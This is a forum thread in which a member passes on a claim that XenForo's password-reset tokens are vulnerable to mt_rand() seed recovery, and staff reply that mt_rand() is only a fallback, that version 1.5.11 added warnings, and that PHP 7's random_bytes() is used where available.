current 0day exploit for xenforo?

Brandon Sheley

Well-known member
I ran across this post on twitter and asked for more info, I tagged @Kier and @Mike on twitter

To view this content we will need your consent to set third party cookies.
For more detailed information, see our cookies page.

He said he contacted you guys already about it as well.

feel free to move this thread if this isn't the right place for it



The PRNG for their password reset mechanism takes values from mt_rand(); and is susceptible to seed recovery attacks

Simply a case of figuring out how the seed is generated, from there you can reset other users passwords (including admins of course)

Writeups on issues w/ PRNG lacking sufficient seeding + another vuln that im not gonna describe (but leads to RCE) coming soon :)

I'm in contact w/ someone @ xenforo already btw. Gave them info on the PRNG issue a while back. Just need to do the writeups.
 
This isn't something we have been contacted about, though we have seen similar comments before about similar claims which are not legitimate. We are just checking to make sure.

The only thing that sprang to mind was that we were contacted about a year ago by @rugk and in response to that we made some changes in XF 1.5.11:
Today, we are pleased to release XenForo 1.5.11. This release fixes a number of bugs and issues that were found since the release of 1.5.10. As this is a maintenance release, the vast majority of the focus was an increase in stability.

Notably, we have adjusted the exact procedure used for generating secure random data to adhere to current best practices. If your system does not have access to a modern and fully secure approach to generating random data, we will now warn you during installation/upgrades and display a message indicating this in the control panel. If possible, we recommend using PHP 7 to take advantage of the new features for generating random numbers. Thanks to @rugk for bringing this to our attention.
Even so, the claim that we use mt_rand() within our random string generator is not exactly accurate for the common case. This only happens as an absolute fallback if a number of other methods do not work. If that method is used, then we (since 1.5.11 noted above) will notify you. Generally, if this concerns you, then the recommendation is to upgrade to PHP 7.0 (or preferably 7.1) as the method used in that case is the native random_bytes() function.
 
Thanks Chris, it's 80% greek to me but if it was a real issue I wanted to pass it on to you guys. :)
Also Mike replied on twitter, maybe the bug guy will contact you guys again.
 
Thanks. Obviously for future reference if you have information that may be related to a security issue then it would be better to contact us privately. If it were a genuine exploit then we'd prefer to only disclose it once we've prepared and released a fix for it.
 
Top Bottom